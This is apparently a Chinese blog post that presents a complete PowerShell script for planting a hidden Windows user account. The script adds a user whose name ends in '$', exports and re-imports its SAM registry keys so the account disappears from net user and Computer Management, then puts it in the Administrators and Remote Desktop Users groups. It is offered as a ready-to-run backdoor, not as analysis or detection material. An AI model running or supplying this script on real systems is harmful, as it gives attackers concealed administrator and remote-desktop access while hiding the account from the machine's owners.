windows创建隐藏用户的powershell脚本

通过保存并重新注册已删除用户的注册表的方式来隐藏用户,未登录时登陆界面不可见,登陆后可见

方法详情见:

https://www.k0rz3n.com/2018/06/26/windows%E6%B8%97%E9%80%8F%E4%B8%AD%E5%90%8E%E9%97%A8%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%96%B9%E6%B3%95%E6%8E%A2%E7%A9%B6/#0X04-%E5%8D%87%E5%8D%8E%EF%BC%9A%E7%9C%9F%E6%AD%A3%E7%9A%84%E9%9A%90%E8%97%8F%EF%BC%8C%E7%AE%A1%E7%90%86%E5%91%98%E6%88%BF%E9%97%B4%E7%9A%84%E5%8F%A6%E4%B8%80%E6%89%87%E9%97%A8

中的第4种方法


powershell脚本如下:
#生成隐藏用户脚本,需要管理员权限运行

 1 #Usage:CreateUser.ps1 <username> <password> 
 2 #用户名使用$结尾
 3 #创建的用户在计算机管理界面,net user,登陆界面不可见.当隐藏用户处于登陆状态时,用户在登陆界面可见
 4 param(
 5 [string] $user,
 6 [string] $pwd
 7 )
 8 $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
 9 $checkname = $user -match '.+\$$'
10 if(-not $checkname){
11 Write-Host "Username should end with '$'"
12 exit
13 }
14 $exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $user}
15 if($exist){
16 Write-Host "$user already existed"
17 exit
18 }
19 $is_admin = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")
20 if(-not $is_admin){
21 Write-Host "Administrator privileged need"
22 exit
23 }
24 net user $user $pwd /add | Out-Null
25 cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user"" | Out-Null
26 $file = Get-Content "$env:temp\$user.reg" | Out-String
27 $pattern="@=hex\((.*?)\)\:"
28 $file -match $pattern |Out-Null
29 $key = "00000"+$matches[1]
30 cmd /c "regedit /e $env:temp\$key.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$key"" | Out-Null
31 net user $user /del | Out-Null
32 cmd /c "regedit /s $env:temp/$user.reg" | Out-Null
33 cmd /c "regedit /s $env:temp/$key.reg" | Out-Null
34 Remove-Item $env:temp/$user.reg
35 Remove-Item $env:temp/$key.reg
36 net localgroup "Administrators" $user /add | Out-Null
37 net localgroup "Remote Desktop Users" $user /add | Out-Null

 

posted @ 2020-05-07 11:51  ic3s3137  阅读(660)  评论(0)    收藏  举报